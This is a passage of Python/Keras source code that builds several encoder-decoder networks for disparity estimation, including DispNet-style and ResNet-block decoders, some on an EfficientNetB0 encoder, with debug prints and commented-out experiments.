X = Conv2DTranspose(256, (1, 1), strides=(
1, 1), padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X, _ = self.convolutional_block_transpose(
X, f=3, filters=[128, 64, 64], stage=8, block='a', s=2)
X = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(X)
# # # decoder Stage 4
X = Concatenate()([X, skip_connect_2])
X = Conv2DTranspose(128, (1, 1), strides=(
1, 1), name='conv9-1', padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv9-1')(X)
X = Activation('relu')(X)
X = Conv2DTranspose(64, (3, 3), strides=(2, 2), name='conv9-2',
padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv9-2')(X)
X = Activation('relu')(X)
X = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(X)
# # decoder Stage 5
X = Concatenate()([X, skip_connect_1])
X = Conv2DTranspose(64, (1, 1), strides=(
1, 1), name='conv10-1', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv10-1')(X)
X = Activation('relu')(X)
X = Conv2DTranspose(32, (1, 1), strides=(
1, 1), name='conv10-2', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv10-2')(X)
X = Activation('relu')(X)
X = Conv2DTranspose(16, (1, 1), strides=(
1, 1), name='conv10-3', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv10-3')(X)
X = Activation('relu')(X)
X = Conv2DTranspose(1, (3, 3), strides=(2, 2), padding="same")(X)
outputs = Activation('sigmoid')(X)
autoencoder = Model(inputs=X_input, outputs=outputs,
name='ResNet_autoencoder')
# print(autoencoder.summary())
return autoencoder
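The encoder above applies five stride-2 stages, so a 'same'-padded input shrinks by ceil(n/2) per stage (a factor of 32 overall when the sides divide evenly); on the way back up, each stride-2 `Conv2DTranspose` with 'same' padding exactly doubles, which is why `Cropping2D` layers appear where an odd intermediate size was rounded up. A small sketch of that bookkeeping (`same_conv_out` and `encoder_sizes` are hypothetical helpers, not part of the class):

```python
import math

def same_conv_out(size, stride):
    """Spatial output size of a 'same'-padded strided conv: ceil(size / stride)."""
    return math.ceil(size / stride)

def encoder_sizes(height, width, strides=(2, 2, 2, 2, 2)):
    """Trace (H, W) through five stride-2 encoder stages."""
    sizes = [(height, width)]
    for s in strides:
        h, w = sizes[-1]
        sizes.append((same_conv_out(h, s), same_conv_out(w, s)))
    return sizes

print(encoder_sizes(224, 224))
# An odd side rounds up: decoding 96 back to 192 overshoots an
# original 191 by one row, hence Cropping2D(((1, 0), (0, 0))).
print(same_conv_out(191, 2))
```

Choosing input sides divisible by 32 makes every stage halve cleanly and lets the decoder skip the crops entirely.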
def DispNet_encoder(self, height, width, depth):
# Conv 1 (batch, 192, 384, 64)
inputs = Input(shape=(height, width, depth))
print("in ----- ",inputs.shape)
conv_1 = Conv2D(64, kernel_size=(7, 7), strides=(2, 2), padding='same')(inputs)
conv_1 = Activation('relu')(conv_1)
print("in_1----- ",conv_1.shape)
# self.conv_1 = conv_1
# Conv 2 (batch, 96, 192, 128)
conv_2 = Conv2D(128, kernel_size=(5, 5), strides=(2, 2), padding='same')(conv_1)
conv_2 = Activation('relu')(conv_2)
print("in_2----- ",conv_2.shape)
# self.conv_2 = conv_2
# Conv 3a (batch, 48, 96, 256)
conv_3a = Conv2D(256, kernel_size=(5, 5), strides=(2, 2), padding='same')(conv_2)
conv_3a = Activation('relu')(conv_3a)
# Conv 3b (batch, 48, 96, 256)
conv_3b = Conv2D(256, kernel_size=(3, 3), strides=(1, 1), padding='same')(conv_3a)
conv_3b = Activation('relu')(conv_3b)
print("in_3----- ",conv_3b.shape)
# self.conv_3b = conv_3b
# Conv 4a (batch, 24, 48, 512)
conv_4a = Conv2D(512, kernel_size=(3, 3), strides=(2, 2), padding='same')(conv_3b)
conv_4a = Activation('relu')(conv_4a)
# Conv 4b (batch, 24, 48, 512)
conv_4b = Conv2D(512, kernel_size=(3, 3), strides=(1, 1), padding='same')(conv_4a)
conv_4b = Activation('relu')(conv_4b)
print("in_4----- ",conv_4b.shape)
# self.conv_4b = conv_4b
# Conv 5a (batch, 12, 24, 512)
conv_5a = Conv2D(512, kernel_size=(3, 3), strides=(2, 2), padding='same')(conv_4b)
conv_5a = Activation('relu')(conv_5a)
# Conv 5b (batch, 12, 24, 512)
conv_5b = Conv2D(512, kernel_size=(3, 3), strides=(1, 1), padding='same')(conv_5a)
conv_5b = Activation('relu')(conv_5b)
print("in_5----- ",conv_5b.shape)
# self.conv_5b = conv_5b
# Conv 6a (batch, 6, 12, 1024)
conv_6a = Conv2D(1024, kernel_size=(3, 3), strides=(2, 2), padding='same')(conv_5b)
conv_6a = Activation('relu')(conv_6a)
# Conv 6b (batch, 6, 12, 1024)
conv_6b = Conv2D(1024, kernel_size=(3, 3), strides=(1, 1), padding='same')(conv_6a)
conv_6b = Activation('relu')(conv_6b)
print("in_6----- ",conv_6b.shape)
# self.conv_6b = conv_6b
# Prediction_Loss 6 (batch, 6, 12, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(conv_6b)
prediction = Activation('relu', name='6x12')(prediction)
# print("not 6---- ",prediction.shape)
pre_1 = prediction
encoder = Model(inputs=inputs, outputs=[conv_1, conv_2, conv_3b, conv_4b, conv_5b, conv_6b, pre_1],
name='DispNet_encoder')
# print(encoder.summary())
return conv_1, conv_2, conv_3b, conv_4b, conv_5b, conv_6b, pre_1
def DispNet_decoder(self, conv_1, conv_2, conv_3b, conv_4b, conv_5b, inputs):
# Upconv 5 (batch, 12, 24, 512)
upconv_5 = Conv2DTranspose(512, kernel_size=(4, 4), strides=(2, 2), padding='same')(inputs)
upconv_5 = BatchNormalization(axis=-1)(upconv_5)
upconv_5 = Activation('relu')(upconv_5)
# Iconv 5 (batch, 12, 24, 512)
c = Concatenate(axis=-1)([upconv_5, conv_5b])
iconv_5 = Conv2D(512, kernel_size=(3, 3), strides=(1, 1), padding='same')(c)
iconv_5 = Activation('relu')(iconv_5)
# Prediction_Loss 5 (batch, 12, 24, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_5)
prediction = Activation('relu', name='12x24')(prediction)
print("5---- ",prediction.shape)
pre_2 = prediction
# Upconv 4 (batch, 24, 48, 256)
upconv_4 = Conv2DTranspose(256, kernel_size=(4, 4), strides=(2, 2), padding='same')(iconv_5)
upconv_4 = BatchNormalization(axis=-1)(upconv_4)
upconv_4 = Activation('relu')(upconv_4)
# Iconv 4 (batch, 24, 48, 256)
c = Concatenate(axis=-1)([upconv_4, conv_4b])
iconv_4 = Conv2D(256, kernel_size=(3, 3), strides=(1, 1), padding='same')(c)
iconv_4 = Activation('relu')(iconv_4)
# Prediction_Loss 4 (batch, 24, 48, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_4)
prediction = Activation('relu', name='24x48')(prediction)
print("4---- ",prediction.shape)
pre_3 = prediction
# Upconv 3 (batch, 48, 96, 128)
upconv_3 = Conv2DTranspose(128, kernel_size=(4, 4), strides=(2, 2), padding='same')(iconv_4)
upconv_3 = BatchNormalization(axis=-1)(upconv_3)
upconv_3 = Activation('relu')(upconv_3)
# Iconv 3 (batch, 48, 96, 128)
upconv_3 = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(upconv_3)
c = Concatenate(axis=-1)([upconv_3, conv_3b])
iconv_3 = Conv2D(128, kernel_size=(3, 3), strides=(1, 1), padding='same')(c)
iconv_3 = Activation('relu')(iconv_3)
# Prediction_Loss 3 (batch, 48, 96, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_3)
prediction = Activation('relu', name='48x96')(prediction)
print("3---- ",prediction.shape)
pre_4 = prediction
# Upconv 2 (batch, 96, 192, 64)
upconv_2 = Conv2DTranspose(64, kernel_size=(4, 4), strides=(2, 2), padding='same')(iconv_3)
upconv_2 = BatchNormalization(axis=-1)(upconv_2)
upconv_2 = Activation('relu')(upconv_2)
# Iconv 2 (batch, 96, 192, 64)
upconv_2 = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(upconv_2)
c = Concatenate(axis=-1)([upconv_2, conv_2])
iconv_2 = Conv2D(64, kernel_size=(3, 3), strides=(1, 1), padding='same')(c)
iconv_2 = Activation('relu')(iconv_2)
# Prediction_Loss 2 (batch, 96, 192, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_2)
prediction = Activation('relu', name='96x192')(prediction)
print("2---- ",prediction.shape)
pre_5 = prediction
# Upconv 1 (batch, 192, 384, 32)
upconv_1 = Conv2DTranspose(32, kernel_size=(4, 4), strides=(2, 2), padding='same')(iconv_2)
upconv_1 = BatchNormalization(axis=-1)(upconv_1)
upconv_1 = Activation('relu')(upconv_1)
# Iconv 1 (batch, 192, 384, 32)
c = Concatenate(axis=-1)([upconv_1, conv_1])
iconv_1 = Conv2D(32, kernel_size=(3, 3), strides=(1, 1), padding='same')(c)
iconv_1 = Activation('relu')(iconv_1)
# Prediction_Loss 1 (batch, 192, 384, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_1)
prediction = Activation('relu', name='192x384')(prediction)
print("1---- ",prediction.shape)
pre_6 = prediction
# Upconv 0 (batch, 384, 768, 16)
upconv_0 = Conv2DTranspose(16, kernel_size=(4, 4), strides=(2, 2), padding='same')(iconv_1)
upconv_0 = BatchNormalization(axis=-1)(upconv_0)
upconv_0 = Activation('relu')(upconv_0)
# Iconv 0 (batch, 384, 768, 16)
iconv_0 = Conv2D(16, kernel_size=(3, 3), strides=(1, 1), padding='same')(upconv_0)
iconv_0 = Activation('relu')(iconv_0)
# Final prediction (batch, 384, 768, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_0)
prediction = Activation('relu', name='final_layer')(prediction)  # Keras layer names must be unique; '192x384' is already used above
print("0---- ", prediction.shape)
pre_final = prediction
decoder = Model(inputs=[conv_1, conv_2, conv_3b, conv_4b, conv_5b, inputs], outputs=[pre_2, pre_3, pre_4, pre_5, pre_6, pre_final], name='DispNet_decoder')
print(decoder.summary())
return pre_2, pre_3, pre_4, pre_5, pre_6, pre_final
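The decoder emits one 1-channel disparity prediction per upsampling stage, each double the resolution of the last; the `Activation` names ('12x24' through '192x384') suggest the coarsest-to-finest pyramid for a 384x768 input, which is an assumption here. A tiny helper (`prediction_pyramid` is hypothetical) that enumerates those resolutions:

```python
def prediction_pyramid(height, width, levels=6):
    """Resolutions of the multi-scale predictions, coarsest first.

    Level k sits 2**k below full resolution; the decoder above doubles
    the spatial size at every stage on the way back up.
    """
    return [(height // 2 ** k, width // 2 ** k)
            for k in range(levels - 1, -1, -1)]

# Assuming a 384x768 input, as the layer names imply:
print(prediction_pyramid(384, 768))
```

Supervising every level of this pyramid (rather than only the final map) is the standard DispNet trick: coarse losses shape the early decoder stages while fine losses refine detail.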
def DispResNet_autoencoder(self, height, width, depth):
# Conv 1 (batch, 192, 384, 64)
inputs = Input(shape=(height, width, depth))
print("in ----- ",inputs.shape)
conv_1 = Conv2D(64, kernel_size=(7, 7), strides=(2, 2), padding='same')(inputs)
conv_1 = Activation('relu')(conv_1)
print("in_1----- ",conv_1.shape)
# self.conv_1 = conv_1
# Conv 2 (batch, 96, 192, 128)
# encoder Stage 2
conv_2a, _ = self.convolutional_block(conv_1, f=3, filters=[64, 64, 128], stage=2, block='a', s=2)
conv_2b, skip_connect_3 = self.identity_block(conv_2a, 3, [64, 64, 128], stage=2, block='b')
print("in_2----- ",conv_2b.shape)
# encoder Stage 3
conv_3a, _ = self.convolutional_block(conv_2b, f=3, filters=[128, 128, 256], stage=3, block='a', s=2)
conv_3b, _ = self.identity_block(conv_3a, 3, [128, 128, 256], stage=3, block='b')
print("in_3----- ",conv_3b.shape)
# encoder Stage 4
conv_4a, _ = self.convolutional_block(conv_3b, f=3, filters=[256, 256, 512], stage=4, block='a', s=2)
conv_4b, _ = self.identity_block(conv_4a, 3, [256, 256, 512], stage=4, block='b')
print("in_4----- ",conv_4b.shape)
# encoder Stage 5
conv_5a, _ = self.convolutional_block(conv_4b, f=3, filters=[256, 256, 512], stage=5, block='a', s=2)
conv_5b, _ = self.identity_block(conv_5a, 3, [256, 256, 512], stage=5, block='b')
print("in_5----- ",conv_5b.shape)
conv_6a = Conv2D(1024, kernel_size=(3, 3), strides=(2, 2), padding='same')(conv_5b)
conv_6a = Activation('relu')(conv_6a)
# Conv 6b (batch, 6, 12, 1024)
conv_6b = Conv2D(1024, kernel_size=(3, 3), strides=(1, 1), padding='same')(conv_6a)
conv_6b = Activation('relu')(conv_6b)
print("in_6----- ",conv_6b.shape)
# self.conv_6b = conv_6b
# Prediction_Loss 6 (batch, 6, 12, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(conv_6b)
prediction = Activation('relu')(prediction)
# print("not 6---- ",prediction.shape)
pre_1 = prediction
upconv_5 = Conv2DTranspose(512, kernel_size=(4, 4), strides=(2, 2), padding='same')(conv_6b)
upconv_5 = BatchNormalization(axis=-1)(upconv_5)
upconv_5 = Activation('relu')(upconv_5)
upconv_5 = Cropping2D(cropping=((1, 0), (1, 0)), data_format=None)(upconv_5)
# Iconv 5 (batch, 12, 24, 512)
c = Concatenate(axis=-1)([upconv_5, conv_5b])
iconv_5 = Conv2D(512, kernel_size=(3, 3), strides=(1, 1), padding='same')(c)
iconv_5 = Activation('relu')(iconv_5)
# Prediction_Loss 5 (batch, 12, 24, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_5)
prediction = Activation('relu')(prediction)
print("5---- ",prediction.shape)
pre_2 = prediction
# Upconv 4 (batch, 24, 48, 256)
upconv_4 = Conv2DTranspose(256, kernel_size=(4, 4), strides=(2, 2), padding='same')(iconv_5)
upconv_4 = BatchNormalization(axis=-1)(upconv_4)
upconv_4 = Activation('relu')(upconv_4)
# Iconv 4 (batch, 24, 48, 256)
c = Concatenate(axis=-1)([upconv_4, conv_4b])
iconv_4 = Conv2D(256, kernel_size=(3, 3), strides=(1, 1), padding='same')(c)
iconv_4 = Activation('relu')(iconv_4)
# Prediction_Loss 4 (batch, 24, 48, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_4)
prediction = Activation('relu', name='24x48')(prediction)
print("4---- ",prediction.shape)
pre_3 = prediction
# Upconv 3 (batch, 48, 96, 128)
upconv_3 = Conv2DTranspose(128, kernel_size=(4, 4), strides=(2, 2), padding='same')(iconv_4)
upconv_3 = BatchNormalization(axis=-1)(upconv_3)
upconv_3 = Activation('relu')(upconv_3)
# Iconv 3 (batch, 48, 96, 128)
# upconv_3 = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(upconv_3)
c = Concatenate(axis=-1)([upconv_3, conv_3b])
iconv_3 = Conv2D(128, kernel_size=(3, 3), strides=(1, 1), padding='same')(c)
iconv_3 = Activation('relu')(iconv_3)
# Prediction_Loss 3 (batch, 48, 96, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_3)
prediction = Activation('relu', name='48x96')(prediction)
print("3---- ",prediction.shape)
pre_4 = prediction
# Upconv 2 (batch, 96, 192, 64)
upconv_2 = Conv2DTranspose(64, kernel_size=(4, 4), strides=(2, 2), padding='same')(iconv_3)
upconv_2 = BatchNormalization(axis=-1)(upconv_2)
upconv_2 = Activation('relu')(upconv_2)
# Iconv 2 (batch, 96, 192, 64)
upconv_2 = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(upconv_2)
c = Concatenate(axis=-1)([upconv_2, conv_2b])
iconv_2 = Conv2D(64, kernel_size=(3, 3), strides=(1, 1), padding='same')(c)
iconv_2 = Activation('relu')(iconv_2)
# Prediction_Loss 2 (batch, 96, 192, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_2)
prediction = Activation('relu', name='96x192')(prediction)
print("2---- ",prediction.shape)
pre_5 = prediction
# Upconv 1 (batch, 192, 384, 32)
upconv_1 = Conv2DTranspose(32, kernel_size=(4, 4), strides=(2, 2), padding='same')(iconv_2)
upconv_1 = BatchNormalization(axis=-1)(upconv_1)
upconv_1 = Activation('relu')(upconv_1)
# Iconv 1 (batch, 192, 384, 32)
upconv_1 = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(upconv_1)
c = Concatenate(axis=-1)([upconv_1, conv_1])
iconv_1 = Conv2D(32, kernel_size=(3, 3), strides=(1, 1), padding='same')(c)
iconv_1 = Activation('relu')(iconv_1)
# Prediction_Loss 1 (batch, 192, 384, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_1)
prediction = Activation('relu', name='192x384')(prediction)
print("1---- ",prediction.shape)
pre_6 = prediction
# Upconv 0 (batch, 384, 768, 16)
upconv_0 = Conv2DTranspose(16, kernel_size=(4, 4), strides=(2, 2), padding='same')(iconv_1)
upconv_0 = BatchNormalization(axis=-1)(upconv_0)
upconv_0 = Activation('relu')(upconv_0)
# Iconv 0 (batch, 384, 768, 16)
iconv_0 = Conv2D(16, kernel_size=(3, 3), strides=(1, 1), padding='same')(upconv_0)
iconv_0 = Activation('relu')(iconv_0)
# Final prediction (batch, 384, 768, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_0)
prediction = Activation('relu', name='final_layer')(prediction)
print("0---- ",prediction.shape)
pre_final = prediction
Disp_ResNet_autoencoder = Model(inputs=inputs, outputs=[pre_5, pre_6 , pre_final], name='Disp_ResNet_autoencoder')
# print(DispNet_autoencoder.summary())
return Disp_ResNet_autoencoder
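Throughout the decoder above, each stride-2 `Conv2DTranspose` doubles the spatial dimensions, and `Cropping2D` trims the leading row/column when the matching skip connection has an odd size. A minimal standalone sketch of that shape arithmetic (pure Python, hypothetical sizes — not part of the model code):

```python
def transpose_conv_same_output(size, stride):
    # Output size of a Conv2DTranspose with padding='same'
    return size * stride


def crop_amount(upsampled, target):
    # Rows/cols to trim from the leading edge so shapes match before Concatenate
    diff = upsampled - target
    return (diff, 0)


h = transpose_conv_same_output(48, 2)  # 48 -> 96
print(crop_amount(h, 95))  # (1, 0) -> Cropping2D(cropping=((1, 0), (0, 0)))
```

This is why `cropping=((1, 0), (0, 0))` appears whenever the encoder feature map at that scale is one row shorter than the doubled decoder map.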
def res_50_disp_autoencoder(self, height, width, depth):
# inputs = Input(shape=(height, width, depth))
# model = ResNet50(weights='imagenet',include_top=False,input_shape=(height, width,3))
# # X = model(inputs, training=True)
# # model.summary()
# skip_1 = model.layers[4].output
# skip_2 = model.layers[38].output
# skip_3 = model.layers[80].output
# skip_4 = model.layers[142].output
# skip_5 = model.layers[174].output
# X = model.layers[-1].output
# use efficientnet as encoder
inputs = Input(shape=(height, width, depth))  # NOTE: unused; the model below is built on the EfficientNet encoder's own inputs
model = EfficientNetB0(include_top=False, weights='imagenet', input_shape=(height, width,3))
skip_1 = model.layers[19].output
skip_2 = model.layers[48].output
skip_3 = model.layers[77].output
skip_4 = model.layers[164].output
skip_5 = model.layers[236].output
X = model.layers[-1].output
conv_6a = Conv2D(1024, kernel_size=(3, 3), strides=(2, 2), padding='same')(X)
conv_6a = Activation('relu')(conv_6a)
# Conv 6b (batch, 6, 12, 1024)
conv_6b = Conv2D(1024, kernel_size=(3, 3), strides=(1, 1), padding='same')(conv_6a)
conv_6b = Activation('relu')(conv_6b)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(conv_6b)
prediction = Activation('sigmoid')(prediction)
# print("not 6---- ",prediction.shape)
pre_1 = prediction
print("6---- ",prediction.shape)
upconv_5 = Conv2DTranspose(512, kernel_size=(4, 4), strides=(2, 2), padding='same')(conv_6b)
upconv_5 = BatchNormalization(axis=-1)(upconv_5)
upconv_5 = Activation('relu')(upconv_5)
upconv_5 = Cropping2D(cropping=((1, 0), (1, 0)), data_format=None)(upconv_5)
# Iconv 5 (batch, 12, 24, 512)
c = Concatenate(axis=-1)([upconv_5, skip_5])
iconv_5 = Conv2D(512, kernel_size=(3, 3), strides=(1, 1), padding='same')(c)
iconv_5 = Activation('relu')(iconv_5)
# Prediction_Loss 5 (batch, 12, 24, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_5)
prediction = Activation('sigmoid')(prediction)
print("5---- ",prediction.shape)
pre_2 = prediction
# Upconv 4 (batch, 24, 48, 256)
upconv_4 = Conv2DTranspose(512, kernel_size=(4, 4), strides=(2, 2), padding='same')(iconv_5)
upconv_4 = BatchNormalization(axis=-1)(upconv_4)
upconv_4 = Activation('relu')(upconv_4)
# Iconv 4 (batch, 24, 48, 256)
c = Concatenate(axis=-1)([upconv_4, skip_4])
iconv_4 = Conv2D(512, kernel_size=(3, 3), strides=(1, 1), padding='same')(c)
iconv_4 = Activation('relu')(iconv_4)
# Prediction_Loss 4 (batch, 24, 48, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_4)
prediction = Activation('sigmoid')(prediction)
print("4---- ",prediction.shape)
pre_3 = prediction
# Upconv 3 (batch, 48, 96, 128)
upconv_3 = Conv2DTranspose(256, kernel_size=(4, 4), strides=(2, 2), padding='same')(iconv_4)
upconv_3 = BatchNormalization(axis=-1)(upconv_3)
upconv_3 = Activation('relu')(upconv_3)
# Iconv 3 (batch, 48, 96, 128)
# upconv_3 = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(upconv_3)
c = Concatenate(axis=-1)([upconv_3, skip_3])
iconv_3 = Conv2D(256, kernel_size=(3, 3), strides=(1, 1), padding='same')(c)
iconv_3 = Activation('relu')(iconv_3)
# Prediction_Loss 3 (batch, 48, 96, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_3)
prediction = Activation('sigmoid')(prediction)
print("3---- ",prediction.shape)
pre_4 = prediction
# Upconv 2 (batch, 96, 192, 64)
upconv_2 = Conv2DTranspose(128, kernel_size=(4, 4), strides=(2, 2), padding='same')(iconv_3)
upconv_2 = BatchNormalization(axis=-1)(upconv_2)
upconv_2 = Activation('relu')(upconv_2)
# Iconv 2 (batch, 96, 192, 64)
upconv_2 = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(upconv_2)
c = Concatenate(axis=-1)([upconv_2, skip_2])
iconv_2 = Conv2D(128, kernel_size=(3, 3), strides=(1, 1), padding='same')(c)
iconv_2 = Activation('relu')(iconv_2)
# Prediction_Loss 2 (batch, 96, 192, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_2)
prediction = Activation('sigmoid')(prediction)
print("2---- ",prediction.shape)
pre_5 = prediction
# Upconv 1 (batch, 192, 384, 32)
upconv_1 = Conv2DTranspose(64, kernel_size=(4, 4), strides=(2, 2), padding='same')(iconv_2)
upconv_1 = BatchNormalization(axis=-1)(upconv_1)
upconv_1 = Activation('relu')(upconv_1)
# Iconv 1 (batch, 192, 384, 32)
upconv_1 = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(upconv_1)
c = Concatenate(axis=-1)([upconv_1, skip_1])
iconv_1 = Conv2D(64, kernel_size=(3, 3), strides=(1, 1), padding='same')(c)
iconv_1 = Activation('relu')(iconv_1)
# Prediction_Loss 1 (batch, 192, 384, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_1)
prediction = Activation('sigmoid')(prediction)
print("1---- ",prediction.shape)
pre_6 = prediction
# Upconv 0 (batch, 384, 768, 32)
upconv_0 = Conv2DTranspose(32, kernel_size=(4, 4), strides=(2, 2), padding='same')(iconv_1)
upconv_0 = BatchNormalization(axis=-1)(upconv_0)
upconv_0 = Activation('relu')(upconv_0)
# Iconv 0 (batch, 384, 768, 32)
iconv_0 = Conv2D(32, kernel_size=(3, 3), strides=(1, 1), padding='same')(upconv_0)
iconv_0 = Activation('relu')(iconv_0)
# Final prediction (batch, 384, 768, 1)
prediction = Conv2D(1, kernel_size=(3, 3), strides=(1, 1), padding='same')(iconv_0)
prediction = Activation('sigmoid', name='final_layer')(prediction)
print("0---- ",prediction.shape)
pre_final = prediction
new_model = Model(inputs=model.inputs, outputs=[pre_5, pre_6, pre_final], name='res_50_disp_autoencoder')
# print(new_model.summary())
return new_model
def ResNet_block_autoencoder(self, height, width, depth):
# inputs = Input(shape=(height, width, depth))
# model = ResNet50(weights='imagenet',include_top=False,input_shape=(height, width,3))
# # X = model(inputs, training=True)
# # model.summary()
# skip_1 = model.layers[4].output
# skip_2 = model.layers[38].output
# skip_3 = model.layers[80].output
# skip_4 = model.layers[142].output
# skip_5 = model.layers[174].output
# X = model.layers[-1].output
# print('E1-------', skip_1.shape)
# print('E2-------', skip_2.shape)
# print('E3-------', skip_3.shape)
# print('E4-------', skip_4.shape)
# print("5---- ",X.shape)
# use efficientnet as encoder
inputs = Input(shape=(height, width, depth))
model = EfficientNetB0(include_top=False, weights='imagenet', input_shape=(height, width,3))
skip_1 = model.layers[19].output
skip_2 = model.layers[48].output
skip_3 = model.layers[77].output
skip_4 = model.layers[164].output
skip_5 = model.layers[236].output
X = model.layers[-1].output
# # # decoder Stage 1
# X = Concatenate()([X, skip_5])
# X, _ = self.identity_block_transpose(
# X, 3, [2048, 2048, 2048], stage=6, block='b')
X, _ = self.identity_block_transpose(
X, 3, [1280, 1280, 1280], stage=6, block='b')
X = Conv2DTranspose(512, (1, 1), strides=(
1, 1), padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X, _ = self.convolutional_block_transpose(
X, f=3, filters=[512, 256, 256], stage=6, block='a', s=2)
# # # decoder Stage 2
X = Concatenate()([X, skip_4])
X = Conv2D(512, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
print("4---- ",X.shape)
X, _ = self.identity_block_transpose(
X, 3, [512, 512, 512], stage=7, block='b')
X = Conv2DTranspose(256, (1, 1), strides=(
1, 1), padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X, _ = self.convolutional_block_transpose(
X, f=3, filters=[256, 128, 128], stage=7, block='a', s=2)
# X = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(X)
# # decoder Stage 3
X = Concatenate()([X, skip_3])
X = Conv2D(256, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
print("3---- ",X.shape)
X, _ = self.identity_block_transpose(
X, 3, [256, 256, 256], stage=8, block='b')
X = Conv2DTranspose(256, (1, 1), strides=(
1, 1), padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X, _ = self.convolutional_block_transpose(
X, f=3, filters=[128, 64, 64], stage=8, block='a', s=2)
X = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(X)
# # # decoder Stage 4
X = Concatenate()([X, skip_2])
X = Conv2D(128, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
print("2---- ",X.shape)
X = Conv2DTranspose(128, (1, 1), strides=(
1, 1), name='conv9-1', padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv9-1')(X)
X = Activation('relu')(X)
X = Conv2DTranspose(64, (3, 3), strides=(2, 2), name='conv9-2',
padding='same', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv9-2')(X)
X = Activation('relu')(X)
X = Cropping2D(cropping=((1, 0), (0, 0)), data_format=None)(X)
# # decoder Stage 5
X = Concatenate()([X, skip_1])
X = Conv2D(64, kernel_size=(3, 3), strides=(1, 1), padding='same')(X)
print("1---- ",X.shape)
X = Conv2DTranspose(64, (1, 1), strides=(
1, 1), name='conv10-1', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv10-1')(X)
X = Activation('relu')(X)
X = Conv2DTranspose(32, (1, 1), strides=(
1, 1), name='conv10-2', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv10-2')(X)
X = Activation('relu')(X)
X = Conv2DTranspose(16, (1, 1), strides=(
1, 1), name='conv10-3', kernel_initializer=glorot_uniform(seed=0))(X)
X = BatchNormalization(axis=3, name='bn_conv10-3')(X)
X = Activation('relu')(X)
X = Conv2DTranspose(1, (3, 3), strides=(2, 2), padding="same")(X)
outputs = Activation('sigmoid')(X)
new_model = Model(inputs=model.inputs, outputs=outputs,
name='ResNet_block_autoencoder')
# print(autoencoder.summary())
return new_model
def ResNet_resblock_disp_autoencoder(self, height, width, depth):
# inputs = Input(shape=(height, width, depth))
# model = ResNet50(weights='imagenet',include_top=False,input_shape=(height, width,3))
# # X = model(inputs, training=True)
# # model.summary()
# skip_1 = model.layers[4].output
# skip_2 = model.layers[38].output
# skip_3 = model.layers[80].output
# skip_4 = model.layers[142].output
# skip_5 = model.layers[174].output
# X = model.layers[-1].output
# print('E1-------', skip_1.shape)
# print('E2-------', skip_2.shape)
# print('E3-------', skip_3.shape)
# print('E4-------', skip_4.shape)
# print("5---- ",X.shape)
# use efficientnet as encoder
inputs = Input(shape=(height, width, depth))
model = EfficientNetB0(include_top=False, weights='imagenet', input_shape=(height, width,3))
skip_1 = model.layers[19].output
skip_2 = model.layers[48].output
skip_3 = model.layers[77].output
skip_4 = model.layers[164].output
skip_5 = model.layers[236].output
X = model.layers[-1].output
# # # decoder Stage 1
# X = Concatenate()([X, skip_5])
# X, _ = self.identity_block_transpose(
# X, 3, [2048, 2048, 2048], stage=6, block='b')
X, _ = self.identity_block_transpose(
